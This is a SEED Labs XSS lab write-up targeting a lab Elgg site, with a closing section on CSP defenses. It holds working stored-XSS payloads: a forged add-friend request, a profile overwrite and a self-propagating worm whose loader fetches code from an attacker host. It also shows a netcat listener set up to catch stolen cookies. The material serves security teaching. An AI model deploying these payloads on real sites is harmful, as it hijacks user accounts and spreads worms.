SEED Lab - Web Security 2 - XSS Lab
1. Lab Setup
Same as the CSRF lab.
2. XSS Attack - add friend
2.1 vim xssaddfriend.txt
// token and ts are "&__elgg_token=..." and "&__elgg_ts=..." taken from the page's
// elgg.security.token (the CSRF token the action requires); 47 is Samy's GUID.
var sendurl = "http://www.xsslabelgg.com/action/friends/add" + "?friend=47" + token + ts;
Ajax.open("GET", sendurl, true);
2.2 Open www.xsslabelgg.com.
Log in as Samy/seedsamy, edit the profile "About me" field: paste the script in, save.
2.3 Alice visits Samy's member page
Log in as Alice/seedalice, open Members and click Samy; Samy is added as her friend automatically.
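The complete add-friend payload that the xssaddfriend.txt fragment belongs to, as an added example (not the lab's handout code), with the URL built by a function so it can be checked outside a browser. It assumes the Elgg page exposes its CSRF token and timestamp as elgg.security.token.__elgg_token and .__elgg_ts, and that Samy's GUID is 47.

```javascript
// Added example, not from the SEED handout. Assumptions: elgg.security.token
// holds __elgg_token and __elgg_ts on every Elgg page; Samy's GUID is 47.

const SAMY_GUID = 47;

function buildAddFriendUrl(security, friendGuid) {
  // action/friends/add is a GET that must carry the page's own token and
  // timestamp. A CSRF page on another site cannot read them; a script running
  // inside the victim's Elgg page can, which is what makes this an XSS job.
  const ts = "&__elgg_ts=" + security.__elgg_ts;
  const token = "&__elgg_token=" + security.__elgg_token;
  return "http://www.xsslabelgg.com/action/friends/add"
       + "?friend=" + friendGuid + token + ts;
}

function addFriend(security, friendGuid) {
  const Ajax = new XMLHttpRequest();
  Ajax.open("GET", buildAddFriendUrl(security, friendGuid), true);
  Ajax.send();
}

// Pasted into Samy's "About me" inside <script> ... </script>, this fires in
// every visitor's browser once the page has loaded. The guard keeps the
// browser-only part from running under Node.
if (typeof window !== "undefined") {
  window.onload = function () {
    addFriend(elgg.security.token, SAMY_GUID);
  };
}
```

The token and timestamp come from the victim's own page, so the request passes Elgg's CSRF check that defeated the plain CSRF version of this attack.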
3. XSS Attack - edit profile
3.1 vim xsseditprofile.txt
// description is the victim's "About me" text; accesslevel[description]=2 makes it public.
var desc = "&description=Samy is hero" + "&accesslevel[description]=2";
var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
// token/ts as in 2.1; name and guid are "&name=..." and "&guid=..." of the logged-in (victim) user.
var content = token + ts + name + desc + guid;
Ajax.open("POST", sendurl, true);
// Without this header PHP does not parse the body into $_POST and the edit is ignored.
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send(content);
3.2 Open www.xsslabelgg.com
Log in as Samy/seedsamy, edit the profile "About me" field: paste the script in, save.
3.3 Alice visits Samy's member page
Log in as Alice/seedalice and check that her own "About me" is blank. After she opens Members and clicks Samy, "Samy is hero" has been written into her "About me".
4. Self-propagating XSS worm
4.1 DOM approach
// The worm's own <script> element carries id="xssworm", so the running code can
// read itself back out of the DOM and put a copy into the victim's profile.
var headerTag = '<script id="xssworm" type="text/javascript">';
var jsCode = document.getElementById("xssworm").innerHTML;
var tailTag = "</" + "script>";   // split so the literal does not close the real script block
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
var desc = "&description=Samy is hero" + wormCode + "&accesslevel[description]=2";
4.2 Link approach
4.2.1 edit xsswormurl.js
// Instead of copying its own body, the worm writes a loader tag that pulls the
// hosted copy from the attacker's site into every infected profile.
var wormCode = encodeURIComponent(
    '<script type="text/javascript" id="xssworm" src="http://www.csrflabattacker.com/xsswormurl.js">' +
    "</" + "script>");
var desc = "&description=Samy is hero" + wormCode + "&accesslevel[description]=2";
4.2.2 cp xsswormurl.js /var/www/CSRF/Attacker/
4.2.3 Edit Samy's "About me" so it holds the same loader tag, pointing at the hosted copy:
<script type="text/javascript" id="xssworm" src="http://www.csrflabattacker.com/xsswormurl.js"></script>
5. Defeating XSS using CSP
5.1 Download csp.zip from the SEED lab site
https://seedsecuritylabs.org/Labs_16.04/Web/Web_XSS_Elgg/files/csp.zip
5.2 Run a simple web server
vim xss_http_server.py
#!/usr/bin/env python3    # shebang, see 6.2
# In the request handler: the two adjacent string literals form one header value.
# 'self' = scripts from the page's own origin, *.example68.com:8000 = any host under
# example68.com on port 8000, 'nonce-1rA2345' = inline scripts carrying nonce="1rA2345".
self.send_header('Content-Security-Policy',
    "default-src 'self';"
    "script-src 'self' *.example68.com:8000 'nonce-1rA2345' ")
$ python3 xss_http_server.py
5.3 Run csptest in Firefox
Edit /etc/hosts so that www.example32.com, www.example68.com and www.example79.com resolve to the address the server listens on, then open:
http://www.example32.com:8000/csptest.html
http://www.example68.com:8000/csptest.html
http://www.example79.com:8000/csptest.html
5.4 Change the Content-Security-Policy header in xss_http_server.py
and reload the three URLs to see which scripts on the page now run, such as:
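To predict what each of the three URLs will show before editing the header, here is a small model of how a browser applies the script-src directive, written as an added example (not part of csp.zip). It supports only what the lab policy uses ('self', 'unsafe-inline', 'nonce-...', and host sources with an optional "*." wildcard and optional port); the list of script elements is a constructed approximation of csptest.html, not the real file.

```javascript
// Added example, not from csp.zip. A simplified CSP script-src evaluator:
// keywords 'self' / 'unsafe-inline', 'nonce-...' sources and host sources with
// an optional "*." wildcard and port. Hashes, scheme sources and path matching
// are not modelled.

function parseScriptSrc(policy) {
  // "default-src 'self'; script-src ..." -> source list for script-src,
  // falling back to default-src when script-src is absent, as CSP does.
  const directives = {};
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0]] = tokens.slice(1);
  }
  return directives["script-src"] || directives["default-src"] || [];
}

function hostSourceMatches(source, scriptUrl) {
  // source: "www.example32.com" or "*.example68.com:8000"; scriptUrl: URL object.
  const [hostPattern, port] = source.split(":");
  const host = scriptUrl.hostname;
  const hostOk = hostPattern.startsWith("*.")
    ? host.endsWith(hostPattern.slice(1))      // any label under the domain
    : host === hostPattern;
  // No port in the source means the scheme's default port (URL.port is "" then).
  const portOk = port === undefined ? scriptUrl.port === "" : scriptUrl.port === port;
  return hostOk && portOk;
}

function scriptAllowed(policy, script, pageUrl) {
  // script: {inline: true, nonce?} or {src, nonce?}. True if the browser would
  // execute it on the page at pageUrl under the policy.
  const sources = parseScriptSrc(policy);
  const nonces = sources.filter(s => s.startsWith("'nonce-")).map(s => s.slice(7, -1));
  if (script.nonce && nonces.includes(script.nonce)) return true;   // nonce wins
  if (script.inline) {
    // 'unsafe-inline' is ignored once the directive carries a nonce or hash.
    return sources.includes("'unsafe-inline'") && nonces.length === 0;
  }
  const page = new URL(pageUrl);
  const target = new URL(script.src, page);            // resolves "./script.js"
  if (sources.includes("'self'") && target.origin === page.origin) return true;
  return sources.filter(s => !s.startsWith("'")).some(s => hostSourceMatches(s, target));
}

// The policy from xss_http_server.py, and a constructed set of script elements
// modelled on csptest.html (the real file differs in detail).
const LAB_POLICY =
  "default-src 'self';" +
  "script-src 'self' *.example68.com:8000 'nonce-1rA2345' ";

const TEST_SCRIPTS = {
  inlineNoNonce:    { inline: true },
  inlineGoodNonce:  { inline: true, nonce: "1rA2345" },
  inlineWrongNonce: { inline: true, nonce: "2rB3456" },
  local:  { src: "./script.js" },
  from32: { src: "http://www.example32.com:8000/script.js" },
  from68: { src: "http://www.example68.com:8000/script.js" },
  from79: { src: "http://www.example79.com:8000/script.js" },
};

function pageView(policy, pageUrl) {
  // Which script elements run when the page is loaded from pageUrl.
  const result = {};
  for (const [name, script] of Object.entries(TEST_SCRIPTS)) {
    result[name] = scriptAllowed(policy, script, pageUrl);
  }
  return result;
}

for (const host of ["www.example32.com", "www.example68.com", "www.example79.com"]) {
  console.log(host, pageView(LAB_POLICY, `http://${host}:8000/csptest.html`));
}
```

The run shows the lab's point: the inline script without the right nonce is blocked on all three hosts, the example68 script loads everywhere because of the wildcard host source, and the example32 and example79 scripts load only when the page itself comes from that host, where 'self' covers them. Changing the header, for example dropping the nonce source or adding 'unsafe-inline', changes the output the same way it changes the page in Firefox.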
6. Others
6.1 Stealing cookies does not work
Put the code in Alice's profile "About me", with a listener on the attacker's host:
$ nc -l 5555 -v
Does not work. Why?
6.2 Shebang
#! is pronounced "shebang".
The #! syntax at the start of a script names the interpreter that should execute it. Most Linux shell, Perl and Python scripts start with a line such as:
#! /bin/bash
or
#! /usr/bin/python3